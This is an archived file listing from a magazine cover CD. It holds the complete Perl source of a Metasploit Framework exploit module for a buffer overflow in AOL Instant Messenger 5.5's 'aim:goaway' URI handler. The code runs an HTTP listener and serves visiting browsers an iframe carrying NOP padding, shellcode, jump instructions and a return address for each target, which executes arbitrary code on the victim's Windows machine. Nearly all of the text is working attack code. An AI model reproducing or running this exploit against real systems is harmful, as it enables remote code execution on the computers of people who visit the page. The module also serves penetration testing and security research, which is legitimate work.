Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / aim_goaway.pm < prev next >

Wrap

Text File | 2006-06-30 | 5KB | 175 lines

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::aim_goaway; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; my $advanced = { }; my $info = { 'Name' => 'AOL Instant Messenger goaway Overflow', 'Version' => '$Revision: 1.7 $', 'Authors' => [ 'skape <mmiller [at] hick.org>', 'thief <thief [at] uninformed.org>' ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying a overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5. }), 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 1014, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40", 'MaxNops' => 1014, 'Keys' => [ '-ws2ord', '-bind' ], }, 'Refs' => [ [ 'OSVDB', 8398 ], [ 'MIL' , 3 ], [ 'URL' , 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic', 0x1108118f ], # proto.ocm [ "Windows XP SP0", 0x71aa2461 ], # ws2help.dll ], 'Keys' => [ 'aim' ], 'DisclosureDate' => 'Aug 9 2004', }; sub new { my $class = shift; my $self; $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced, }, @_); return $self; } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp'); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } $self->PrintLine("[*] Waiting for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ..."); while (defined($client = $server->accept())) { $self->HandleHttpClient(fd => $client); } return; } sub HandleHttpClient { my $self = shift; my ($fd) = @{{@_}}{qw/fd/}; my $targetIdx = $self->GetVar('TARGET'); my $target = $self->Targets->[$targetIdx]; my $ret = $target->[1]; my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $content; my $rhost; my $rport; my $os = "Unknown"; # Read the HTTP command my ($cmd, $url, $proto) = split / /, <$fd>; # Read in the HTTP headers while (<$fd>) { my ($var, $val) = split /: /, $_; # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); if ($var eq 'User-Agent') { $os = "Windows 2003" if (!$os and $val =~ /Windows NT 5.2/); $os = "Windows XP" if (!$os and $val =~ /Windows NT 5.1/); $os = "Windows 2000" if (!$os and $val =~ /Windows NT 5.0/); $os = "Windows NT" if (!$os and $val =~ /Windows NT/); } } # Build the HTML my $src = ($self->MakeNops(1014 - length($shellcode))) . # nops $shellcode . # payload "\xeb\x07\x90\x90" . # jmp +7 pack("V", $ret) . # return address "\x90\xe9\x13\xfc\xff\xff"; # jmp -1000 my $content = "<html> <iframe src='aim:goaway?message=$src'> </html>"; # Set the remote host ($rport, $rhost) = sockaddr_in(getpeername($fd)); $rhost = inet_ntoa($rhost); $self->PrintLine("[*] HTTP Client connected from $rhost using $os, sending payload..."); # Transmit the HTTP response print $fd "HTTP/1.1 200 OK\r\n" . "Content-Type: text/html\r\n" . "Content-Length: " . length($content) . "\r\n" . "Connection: close\r\n" . "\r\n" . "$content"; $fd->close(); } 1;